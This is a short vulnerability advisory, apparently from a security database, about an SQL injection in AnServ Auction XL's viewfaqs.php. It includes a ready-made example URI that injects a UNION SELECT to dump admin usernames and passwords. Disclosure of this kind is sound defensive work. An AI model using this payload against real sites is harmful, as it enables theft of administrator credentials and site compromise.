|
AnServ Auction XL 'viewfaqs.php' SQL Injection Vulnerability
Attackers can use a browser to exploit this issue. The following example URI is available: http://www.example.com/viewfaqs.php?cat=-1%20union%20select%20concat(id,0x3a,username,0x3a,password)%20from PHPAUCTIONXL_adminusers-- |
|
Privacy Statement |